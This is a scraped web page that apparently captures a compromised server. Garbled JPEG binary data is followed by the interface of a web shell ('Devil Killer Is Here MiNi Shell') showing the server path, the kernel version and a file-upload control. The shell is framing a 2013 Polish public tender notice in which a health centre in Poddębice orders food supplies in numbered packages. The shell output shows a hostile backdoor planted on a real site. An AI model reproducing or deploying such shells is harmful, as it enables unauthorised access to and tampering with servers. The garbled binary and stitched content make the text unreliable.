JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131120/246879-N-2013.html

<p class="kh_header"><b>Poddębice: Dostawy produktów żywnościowych dla Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach</b><br>
<b>Numer ogłoszenia: 246879 - 2013; data zamieszczenia: 20.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poddębickie Centrum Zdrowia"spółka z o.o. , ul. Mickiewicza 16, 99-200 Poddębice, woj. łódzkie, tel. 43 678 20 21, faks 43 678 20 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nzozpcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy produktów żywnościowych dla Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są dostawy produktów żywnościowych dla Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach, w ilościach i asortymencie szczegółowo określonych w Załączniku nr 3 do SIWZ - Formularz cenowy. Kod CPV: 15.80.00.00-6;  15.81.00.00-9, 15.50.00.00-3; 03.22.00.00-9; 03.21.21.00-1; 15.89.60.00-5 15.22.00.00-6; 15.11.00.00-2; 15.11.20.00-6; 15.13.15.00-0; 15.13.11.30-5; 15.88.20.00-4; 15.88.40.00-8;  03.14.25.00-3
2.	Oferowany towar winien spełniać warunki szczegółowo określone w Formularzu cenowym - załącznik nr 3 do SIWZ. 
3.	Wykonawca będzie dostarczał towar spełniający wymagania, co do jakości, terminu przydatności do spożycia i oznakowania, określone prawem, a w szczególności: ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2006, Nr 171, poz. 1225 z późn. zm.), ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno-spożywczych (Dz. U. 2001r., Nr 5 poz. 44 z późn. zm.) oraz rozporządzeniami z nimi powiązanymi.
4.	Realizacja dostaw będzie się odbywać sukcesywnie na podstawie zamówień składanych przez upoważnionego pracownika Działu Żywienia Zamawiającego za pośrednictwem e-maila lub faxu, za potwierdzeniem transmisji.
5.	Dostawy towaru nastąpią według potrzeb Zamawiającego:
a) 1 raz w tygodniu - (zamówienie złożone minimum 48h przed dostawą towarów) - dla pakietu: 1, 2, 6, 11, 12;
b)  6 razy w tygodniu (od poniedziałku do soboty do godziny 7:00) - dla pakietu 3;
c) 5 razy w tygodniu (od poniedziałku do piątku do godziny 8:00) - dla pakietu nr 8, 10;
d) 3 razy w tygodniu - zamówienie złożone minimum 24 h przed dostawą - dla Pakietu nr 4, 5, 7, 9;
6.	Realizacja dostaw będzie odbywać się w godzinach 7:00-14:00 lub innych uzgodnionych każdorazowo z upoważnionym pracownikiem Działu Żywienia Zamawiającego, a w przypadku pakietów 3 i 4 do godziny 7:00 oraz pakietu 8 i 10 do godziny 8:00.
7.	Dostawa przedmiotu umowy odbywać się będzie na koszt i ryzyko Wykonawcy do Działu Żywienia Zamawiającego mieszczącego się w siedzibie Poddębickiego Centrum Zdrowia Sp. z o.o. w Poddębicach, przy ulicy Mickiewicza 16. Wykonawca zobowiązany jest do złożenia zamówionego towaru w miejscu wskazanym przez pracownika Działu Żywienia Zamawiającego.
8.	Zamawiający zastrzega sobie możliwość zwrotu niewykorzystanego pieczywa a Wykonawca obowiązany jest do przyjęcia zwrotu i dokonania korekty faktury o zwróconą ilość pieczywa. Zwrot pieczywa nastąpi nie później niż w ciągu 72h od dostawy pieczywa - dotyczy Pakietu nr 3. 
9.	Faktyczna ilość zamawianych produktów żywnościowych zależna będzie od rzeczywistych potrzeb Zamawiającego. Określone przez Zamawiającego w Załączniku nr 3 do SIWZ (stanowiącym załącznik nr 1 do umowy) ilości produktów żywnościowych nie stanowią zobowiązania Zamawiającego do ich zakupienia u Wykonawcy i nie mogą być podstawą żadnych roszczeń ze strony Wykonawcy.
10.	Wykonawca jest zobowiązany dostarczać produkty oznaczone w pakietach odpowiadające normom kontroli jakości w obowiązującym systemie GHP, GMP, HACCP. Przedmiot zamówienia musi być dostarczany: w najlepszym gatunku, zgodnie z obowiązującymi normami, wolny od zapachów obcych i zanieczyszczeń oraz szkodników, nieuszkodzony, zawsze świeży i zgodny z terminem ważności.
11.	Dostawa przedmiotu zamówienia odbywać się będzie w odpowiednich opakowaniach (zamkniętych i nieuszkodzonych), transportem zapewniającym należyte zabezpieczenie przed czynnikami zewnętrznymi i przystosowanym do przewozu żywności - zgodnie z obowiązującymi przepisami.
12.	Produkty muszą być odpowiednio oznakowane, posiadać datę minimalnej trwałości.
13.	Ewentualne reklamacje dostaw z tytułu jakości lub ilości dostarczonego towaru składane będą Wykonawcy za pośrednictwem e-maila lub faxu, za potwierdzeniem transmisji niezwłocznie po ich stwierdzeniu przez Zamawiającego.
14.	Wykonawca jest zobowiązany do udzielenia odpowiedzi na złożoną reklamację w ciągu 24 h od chwili złożenia reklamacji, a w przypadku braku odpowiedzi reklamację uważać się będzie w całości uznaną przez Wykonawcę.
15.	W przypadku uznania reklamacji za zasadną Wykonawca zobowiązany jest w terminie 24 h od chwili uznania reklamacji wymienić towar na wolny od wad bądź uzupełnić braki ilościowe na własny koszt i we własnym zakresie.
16.	W przypadku braku realizacji zamówienia w terminach określonych w pkt. 3.5  SIWZ, a także w przypadku uchybienia terminowi, o którym mowa w pkt. 3.14 SIWZ - Zamawiający ma prawo dokonać zakupu przedmiotu zamówienia we własnym zakresie i obciążyć Wykonawcę wszelkimi kosztami poniesionymi z tego tytułu oraz naliczyć kary umowne określone w § 6 ust.1 ppkt. 1.2 i 1.4. wzoru umowy - Załącznik nr 2 do SIWZ.
17.	Zamawiający dopuszcza możliwość zamieszczenia przez Wykonawcę w Formularzu ofertowym (Załącznik Nr 1 do SIWZ) i Formularzu cenowym (Załącznik Nr 3 do SIWZ) tylko tych pakietów na które składa ofertę..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9, 15.50.00.00-3, 03.22.00.00-9, 03.21.21.00-1, 15.89.60.00-5, 15.22.00.00-6, 15.11.00.00-2, 15.11.20.00-6, 15.13.15.00-0, 15.13.11.30-5, 15.88.20.00-4, 15.88.40.00-8, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży:
 - oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży:
 - oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży:
 - oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży:
 - oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że w/w warunek Wykonawca spełnił  jeżeli Wykonawca złoży:
 - oświadczenie, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania warunku udziału w postępowaniu dokonywana będzie w oparciu o złożony przez Wykonawcę dokument metodą warunku granicznego spełnia/nie spełnia.
W ogólnym zakresie spełnienia warunków o których mowa w art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, Wykonawca zobligowany jest do złożenia oświadczenia, którego treść stanowi załącznik nr 4 do SIWZ.
Ocena spełniania ww. warunków dokonana zostanie na zasadzie spełnia/nie spełnia w oparciu o informacje zawarte w dokumentach wymienionych w pkt. 8 SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Opisy, foldery, katalogi w języku polskim potwierdzające wymagane parametry zawarte w Załączniku Nr 3 do SIWZ - dotyczy Pakietu nr 10 i 12,
2.	Oświadczenie o dysponowaniu zatwierdzonym przez Państwowego/ Powiatowego Inspektora Sanitarnego lub Weterynaryjnego środkiem transportu do przewozu artykułów będących przedmiotem zamówienia - dotyczy Pakietu nr 2, 3, 4, 5, 8, 9, 10, 11.
3. Formularz cenowy - Załącznik Nr 3 do SIWZ.

Informacja o zawartości oferty:
Ofertę stanowi: 
Formularz ofertowy - wypełniony i podpisany przez osoby upoważnione do reprezentowania  Wykonawcy (zgodnie z dokumentem określającym  status prawny Wykonawcy lub dołączonym do oferty pełnomocnictwem) stanowiący załącznik nr 1 do SIWZ.

Dokumenty składane z ofertą:
-	Oświadczenia i dokumenty wymienione w pkt 8.1-8.6 SIWZ.
-	Formularz cenowy - Załącznik Nr 3 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość wprowadzenia zmiany w umowie w przypadku zaprzestania produkcji którejkolwiek z części asortymentu będącego przedmiotem umowy, wówczas Wykonawca zobowiązuje się do niezwłocznego potwierdzenia stosownym dokumentem zaprzestania wytwarzania produktu oraz do przedstawienia Zamawiającemu propozycji zamiennika takiego wyrobu o parametrach nie gorszych niż zaoferowane w przetargu w cenie zaoferowanej za przedmiot umowy w przetargu lub cenie korzystniejszej dla Zamawiającego niż w przetargu. Zmiana umowy w tym zakresie nastąpi po pisemnym zaakceptowaniu przez Zamawiającego propozycji zamiennika. W przypadku dwukrotnego braku pisemnej akceptacji Zamawiającego na zaproponowany produkt zamienny, Zamawiający dokona zakupu produktu we własnym zakresie obciążając Wykonawcę różnicą cen oraz naliczy kary umowne zgodnie z zapisami §6 ust. 1 ppkt. 1.2, 1.4.
2.	Dopuszcza się zmianę postanowień zawartej umowy polegającą na obniżeniu ceny jednostkowej przedmiotu umowy np. w przypadku okresowych promocji cenowych towaru, stosowanych przez producentów. Strony uzgadniają że w tym okresie dostawy towarów wyszczególnionych w załączniku nr 1 do umowy będą realizowane przez Wykonawcę po cenach niższych, uwzględniających promocję cenową, po wcześniejszym poinformowaniu Zamawiającego w formie pisemnej.
3.	Dopuszcza się zmiany umowy polegające na obniżeniu ceny jednostkowej towaru.
4.	Dopuszcza się zmiany stawki podatku VAT, które to obowiązują z chwilą wprowadzenia ich stosowanymi przepisami, w tej sytuacji cena jednostkowa netto nie ulega zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nzozpcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poddębickie Centrum Zdrowia Sp. z o.o., 99-200 Poddębice ul. Mickiewicza 16, Sekretariat Zarządu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2013 godzina 10:00, miejsce: Poddębickie Centrum Zdrowia Sp. z o.o., 99-200 Poddębice ul. Mickiewicza 16 Budynek Administracji, I piętro - Sekretariat Zarządu.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Cukier,	1kg,	kg	2 000;
2.	Sól jodowana,	1kg,	kg	600;   
3.	Mąka pszenna typ 450,	1kg, 	kg	1 500; 
4.	Mąka pszenna typ 480,	1kg,	kg	500;
5.	Przyprawa warzywna,	200g,	szt.	600;
6.	Przyprawa do drobiu,	100g,	szt.	100;   
7.	Przyprawa do gulaszu,	20 g,	szt.	20; 
8.	Przyprawa do zup w płynie,	1L,	szt.	50;   
9.	Papryka mielona słodka,	20g,	szt.	20;   
10.	Papryka mielona ostra,	20g,	szt.	20;   
11.	Majeranek,	20g,	szt.	100;  
12.	Liść laurowy,	20g,	szt.	100;  
13.	Ziele angielskie,	20g,	szt.	100;   
14.	Pieprz mielony,	20g,	szt.	500;   
15.	Pieprz ziarnisty,	20g,	szt.	20;   
16.	Olej rzepakowy,	1L,	szt.	650 ;  
17.	Herbata,	100g,	szt.	1 000;   
18.	Herbata expresowa torebka min.1,4g,	250 szt,	opakowań	120;   
19.	Kakao ciemne,	200g,	szt.	30;   
20.	Ryż sypki	1kg,	kg,	450;   
21.	Kasza manna,	1kg,	kg	400;  
22.	Kasza jęczmienna,	1kg,	kg	650;  
23.	Kwasek cytrynowy,	20g,	szt.	1 800;  
24.	Zacierka makaronowa, kg	150;   
25.	Makaron - świderki, kg	500; 
26.	Makaron - wstążka	, kg	200;   
27.	Makaron - nitka, kg	200;   
28.	Makaron - krajanka	, kg	200;   
29.	Koncentrat pomidorowy,	70g,	szt.	100; 
30.	Aronia - koncentrat w proszku,	100g,	szt.	700;   
31.	Majonez (zawartość tłuszczu min.68%),	700g,	szt.	70;   
32.	Musztarda,	200g,	szt.	100;   
33.	Ketchup,	250g,	szt.	30;   
34.	Chrzan,	190g,	szt.	20;   
35.	Groszek konserwowy,	400g,	szt.	60;  
36.	Kukurydza konserwowa,	400g,	szt.	50;   
37.	Szczaw konserwowy,	0,9 L,	szt.	40;   
38.	Sok malinowy słodzony,	0,5 l,	szt.	300;   
39.	Barszcz biały w płynie,	480g,	szt.	450;   
40.	Dżem,	25g,	szt.	3 000;   
41.	Dżem brzoskwiniowy,	1kg,	szt.	120;   
42.	Dżem wiśniowy,	1kg,	szt.	120;   
43.	Dżem z czarnej porzeczki,	1kg,	szt.	120;   
44.	Miód naturalny wielokwiatowy,	25g,	szt.	100;   
45.	Kisiel,	40g, 	szt.	250;   
46.	Galaretka	90g, 	szt.	200;   
47.	Budyń (? l mleka),	40g,	szt.	300;   
48.	Herbatniki,	14-20 g,	szt.	1 000;   
49.	Wafelki,	20g,	szt.	1 000;   
50.	Chrupki kukurydziane,	70g,	szt.	200;   
51.	Suchary bez cukru,	270 - 300 g,	szt.	120;   
52.	Pasztet drobiowy,	130g,	szt.	800;   
53.	Wafle ryżowe,	100g,	szt.	90;   
54.	Listki waflowe bez cukru,	38-40g,	szt.	150;   
55.	Drożdże,	100g,	szt.	50;   
56.	Żelatyna,	50g,	szt.	20;   
57.	Proszek do pieczenia,	30g,	szt.	20;   
58.	Cukier waniliowy,	32g,	szt.	20;   
59.	Cynamon,	20g,	szt.	20;   
60.	Koncentrat pomidorowy,	950g,	szt.	250;   
61.	Koncentrat barszczu czerwonego, zagęszczony sok z buraków min. 59,3%,	300ml,	szt.	100;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Jaja	L (60-65)	, szt.	20 000;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Chleb pszenno-żytni,	1100-1200g,	szt.	6 800;   
2.	Chleb razowy,	600g,	szt.	3 000;   
3.	Bułka zwykła,	50g,	szt.	30 000;   
4.	Bułka tarta, kg	70;   
5.	Pączek,	szt.	100;   
6.	Bułka słodka, szt.	100;   
7.	Angielka,	400 g,	szt.	4 000;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleko 2%	10L,	L	10 000;   
2.	Mleko 2%	1L,	L	5 000;   
3.	Śmietana 12%,	400 g,	szt.	350;   
4.	Ser biały półtłusty	folia,	kg	2 000;  
5.	Ser żółty - twardy	typu Salami, Morski, 	kg	300;   
6.	Ser topiony-plastry,	130g,	szt.	2 000;   
7.	Ser topiony-krążki,	140g,	szt.	1 700;   
8.	Margaryna,	250g,	szt.	100   
9.	Masło śmietankowe	, 200g,	szt.	20;   
10.	Kefir,	1L,	szt.	30;   
11.	Serek homogenizowany naturalny,	120 - 150g,	szt.	400;   
12.	Serek homogenizowany waniliowy,	120 - 150g,	szt.	150;   
13.	Jogurt owocowy,	120 - 150g,	szt.	1 200;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
